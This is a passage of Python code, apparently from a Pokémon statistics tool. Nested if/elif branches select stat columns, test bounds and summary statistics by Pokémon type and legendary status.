stat_stats = loaddata.non_legendary_fairy_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fairy_types['sp_attack']
stat_stats = loaddata.non_legendary_fairy_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fairy_types['sp_defense']
stat_stats = loaddata.non_legendary_fairy_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_fairy_types['height_m']
stat_stats = loaddata.non_legendary_fairy_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_fairy_types['weight_kg']
stat_stats = loaddata.non_legendary_fairy_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# normal pokemon
elif type_set == "10":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_normal_types['total_points']
stat_stats = loaddata.non_legendary_normal_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_normal_types['hp']
stat_stats = loaddata.non_legendary_normal_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_normal_types['speed']
stat_stats = loaddata.non_legendary_normal_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_normal_types['attack']
stat_stats = loaddata.non_legendary_normal_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_normal_types['defense']
stat_stats = loaddata.non_legendary_normal_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_normal_types['sp_attack']
stat_stats = loaddata.non_legendary_normal_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_normal_types['sp_defense']
stat_stats = loaddata.non_legendary_normal_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_normal_types['height_m']
stat_stats = loaddata.non_legendary_normal_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_normal_types['weight_kg']
stat_stats = loaddata.non_legendary_normal_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# fighting pokemon
elif type_set == "11":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_fighting_types['total_points']
stat_stats = loaddata.non_legendary_fighting_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fighting_types['hp']
stat_stats = loaddata.non_legendary_fighting_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fighting_types['speed']
stat_stats = loaddata.non_legendary_fighting_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fighting_types['attack']
stat_stats = loaddata.non_legendary_fighting_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fighting_types['defense']
stat_stats = loaddata.non_legendary_fighting_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fighting_types['sp_attack']
stat_stats = loaddata.non_legendary_fighting_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fighting_types['sp_defense']
stat_stats = loaddata.non_legendary_fighting_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_fighting_types['height_m']
stat_stats = loaddata.non_legendary_fighting_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_fighting_types['weight_kg']
stat_stats = loaddata.non_legendary_fighting_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# flying pokemon
elif type_set == "12":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_flying_types['total_points']
stat_stats = loaddata.non_legendary_flying_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_flying_types['hp']
stat_stats = loaddata.non_legendary_flying_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_flying_types['speed']
stat_stats = loaddata.non_legendary_flying_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_flying_types['attack']
stat_stats = loaddata.non_legendary_flying_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_flying_types['defense']
stat_stats = loaddata.non_legendary_flying_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_flying_types['sp_attack']
stat_stats = loaddata.non_legendary_flying_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_flying_types['sp_defense']
stat_stats = loaddata.non_legendary_flying_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_flying_types['height_m']
stat_stats = loaddata.non_legendary_flying_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_flying_types['weight_kg']
stat_stats = loaddata.non_legendary_flying_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# poison pokemon
elif type_set == "13":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_poison_types['total_points']
stat_stats = loaddata.non_legendary_poison_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_poison_types['hp']
stat_stats = loaddata.non_legendary_poison_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_poison_types['speed']
stat_stats = loaddata.non_legendary_poison_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_poison_types['attack']
stat_stats = loaddata.non_legendary_poison_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_poison_types['defense']
stat_stats = loaddata.non_legendary_poison_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_poison_types['sp_attack']
stat_stats = loaddata.non_legendary_poison_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_poison_types['sp_defense']
stat_stats = loaddata.non_legendary_poison_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_poison_types['height_m']
stat_stats = loaddata.non_legendary_poison_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_poison_types['weight_kg']
stat_stats = loaddata.non_legendary_poison_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ground pokemon
elif type_set == "14":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_ground_types['total_points']
stat_stats = loaddata.non_legendary_ground_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ground_types['hp']
stat_stats = loaddata.non_legendary_ground_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ground_types['speed']
stat_stats = loaddata.non_legendary_ground_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ground_types['attack']
stat_stats = loaddata.non_legendary_ground_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ground_types['defense']
stat_stats = loaddata.non_legendary_ground_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ground_types['sp_attack']
stat_stats = loaddata.non_legendary_ground_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ground_types['sp_defense']
stat_stats = loaddata.non_legendary_ground_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_ground_types['height_m']
stat_stats = loaddata.non_legendary_ground_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_ground_types['weight_kg']
stat_stats = loaddata.non_legendary_ground_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# rock pokemon
elif type_set == "15":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_rock_types['total_points']
stat_stats = loaddata.non_legendary_rock_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_rock_types['hp']
stat_stats = loaddata.non_legendary_rock_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_rock_types['speed']
stat_stats = loaddata.non_legendary_rock_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_rock_types['attack']
stat_stats = loaddata.non_legendary_rock_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_rock_types['defense']
stat_stats = loaddata.non_legendary_rock_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_rock_types['sp_attack']
stat_stats = loaddata.non_legendary_rock_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_rock_types['sp_defense']
stat_stats = loaddata.non_legendary_rock_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_rock_types['height_m']
stat_stats = loaddata.non_legendary_rock_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_rock_types['weight_kg']
stat_stats = loaddata.non_legendary_rock_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# bug pokemon
elif type_set == "16":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_bug_types['total_points']
stat_stats = loaddata.non_legendary_bug_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_bug_types['hp']
stat_stats = loaddata.non_legendary_bug_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_bug_types['speed']
stat_stats = loaddata.non_legendary_bug_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_bug_types['attack']
stat_stats = loaddata.non_legendary_bug_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_bug_types['defense']
stat_stats = loaddata.non_legendary_bug_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_bug_types['sp_attack']
stat_stats = loaddata.non_legendary_bug_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_bug_types['sp_defense']
stat_stats = loaddata.non_legendary_bug_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_bug_types['height_m']
stat_stats = loaddata.non_legendary_bug_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_bug_types['weight_kg']
stat_stats = loaddata.non_legendary_bug_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ghost pokemon
elif type_set == "17":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_ghost_types['total_points']
stat_stats = loaddata.non_legendary_ghost_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ghost_types['hp']
stat_stats = loaddata.non_legendary_ghost_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ghost_types['speed']
stat_stats = loaddata.non_legendary_ghost_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ghost_types['attack']
stat_stats = loaddata.non_legendary_ghost_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ghost_types['defense']
stat_stats = loaddata.non_legendary_ghost_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ghost_types['sp_attack']
stat_stats = loaddata.non_legendary_ghost_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ghost_types['sp_defense']
stat_stats = loaddata.non_legendary_ghost_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_ghost_types['height_m']
stat_stats = loaddata.non_legendary_ghost_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_ghost_types['weight_kg']
stat_stats = loaddata.non_legendary_ghost_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# steel pokemon
elif type_set == "18":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_steel_types['total_points']
stat_stats = loaddata.non_legendary_steel_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_steel_types['hp']
stat_stats = loaddata.non_legendary_steel_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_steel_types['speed']
stat_stats = loaddata.non_legendary_steel_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_steel_types['attack']
stat_stats = loaddata.non_legendary_steel_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_steel_types['defense']
stat_stats = loaddata.non_legendary_steel_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_steel_types['sp_attack']
stat_stats = loaddata.non_legendary_steel_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_steel_types['sp_defense']
stat_stats = loaddata.non_legendary_steel_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_steel_types['height_m']
stat_stats = loaddata.non_legendary_steel_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_steel_types['weight_kg']
stat_stats = loaddata.non_legendary_steel_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# all pokemon (trimmed h & w)
elif type_set == "19":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_total_points
stat_stats = loaddata.non_legendary_total_points_stats
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_hp
stat_stats = loaddata.non_legendary_hp_stats
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_speed
stat_stats = loaddata.non_legendary_speed_stats
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_attack
stat_stats = loaddata.non_legendary_attack_stats
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_defense
stat_stats = loaddata.non_legendary_defense_stats
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_sp_attack
stat_stats = loaddata.non_legendary_sp_attack_stats
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_sp_defense
stat_stats = loaddata.non_legendary_sp_defense_stats
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_height
stat_stats = loaddata.non_legendary_height_stats
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_weight
stat_stats = loaddata.non_legendary_weight_stats
unit = '(kg)'
else:
return
else:
return
elif data_set == "4": # legendary pokemon
set_name = "Legendary Pokemon"
modifier = '(legendary)'
if type_set == "1":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_grass_types['total_points']
stat_stats = loaddata.legendary_grass_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_grass_types['hp']
stat_stats = loaddata.legendary_grass_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_grass_types['speed']
stat_stats = loaddata.legendary_grass_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_grass_types['attack']
stat_stats = loaddata.legendary_grass_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_grass_types['defense']
stat_stats = loaddata.legendary_grass_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_grass_types['sp_attack']
stat_stats = loaddata.legendary_grass_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_grass_types['sp_defense']
stat_stats = loaddata.legendary_grass_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_grass_types['height_m']
stat_stats = loaddata.legendary_grass_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_grass_types['weight_kg']
stat_stats = loaddata.legendary_grass_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# fire pokemon
elif type_set == "2":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_fire_types['total_points']
stat_stats = loaddata.legendary_fire_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fire_types['hp']
stat_stats = loaddata.legendary_fire_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fire_types['speed']
stat_stats = loaddata.legendary_fire_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fire_types['attack']
stat_stats = loaddata.legendary_fire_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fire_types['defense']
stat_stats = loaddata.legendary_fire_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fire_types['sp_attack']
stat_stats = loaddata.legendary_fire_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fire_types['sp_defense']
stat_stats = loaddata.legendary_fire_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_fire_types['height_m']
stat_stats = loaddata.legendary_fire_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_fire_types['weight_kg']
stat_stats = loaddata.legendary_fire_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# water pokemon
elif type_set == "3":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_water_types['total_points']
stat_stats = loaddata.legendary_water_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_water_types['hp']
stat_stats = loaddata.legendary_water_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_water_types['speed']
stat_stats = loaddata.legendary_water_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_water_types['attack']
stat_stats = loaddata.legendary_water_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_water_types['defense']
stat_stats = loaddata.legendary_water_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_water_types['sp_attack']
stat_stats = loaddata.legendary_water_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_water_types['sp_defense']
stat_stats = loaddata.legendary_water_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_water_types['height_m']
stat_stats = loaddata.legendary_water_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_water_types['weight_kg']
stat_stats = loaddata.legendary_water_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# electric pokemon
elif type_set == "4":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_electric_types['total_points']
stat_stats = loaddata.legendary_electric_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_electric_types['hp']
stat_stats = loaddata.legendary_electric_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_electric_types['speed']
stat_stats = loaddata.legendary_electric_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_electric_types['attack']
stat_stats = loaddata.legendary_electric_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_electric_types['defense']
stat_stats = loaddata.legendary_electric_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_electric_types['sp_attack']
stat_stats = loaddata.legendary_electric_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_electric_types['sp_defense']
stat_stats = loaddata.legendary_electric_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_electric_types['height_m']
stat_stats = loaddata.legendary_electric_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_electric_types['weight_kg']
stat_stats = loaddata.legendary_electric_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# psychic pokemon
elif type_set == "5":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_psychic_types['total_points']
stat_stats = loaddata.legendary_psychic_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_psychic_types['hp']
stat_stats = loaddata.legendary_psychic_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_psychic_types['speed']
stat_stats = loaddata.legendary_psychic_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_psychic_types['attack']
stat_stats = loaddata.legendary_psychic_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_psychic_types['defense']
stat_stats = loaddata.legendary_psychic_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_psychic_types['sp_attack']
stat_stats = loaddata.legendary_psychic_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_psychic_types['sp_defense']
stat_stats = loaddata.legendary_psychic_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_psychic_types['height_m']
stat_stats = loaddata.legendary_psychic_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_psychic_types['weight_kg']
stat_stats = loaddata.legendary_psychic_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ice pokemon
elif type_set == "6":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_ice_types['total_points']
stat_stats = loaddata.legendary_ice_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ice_types['hp']
stat_stats = loaddata.legendary_ice_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ice_types['speed']
stat_stats = loaddata.legendary_ice_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
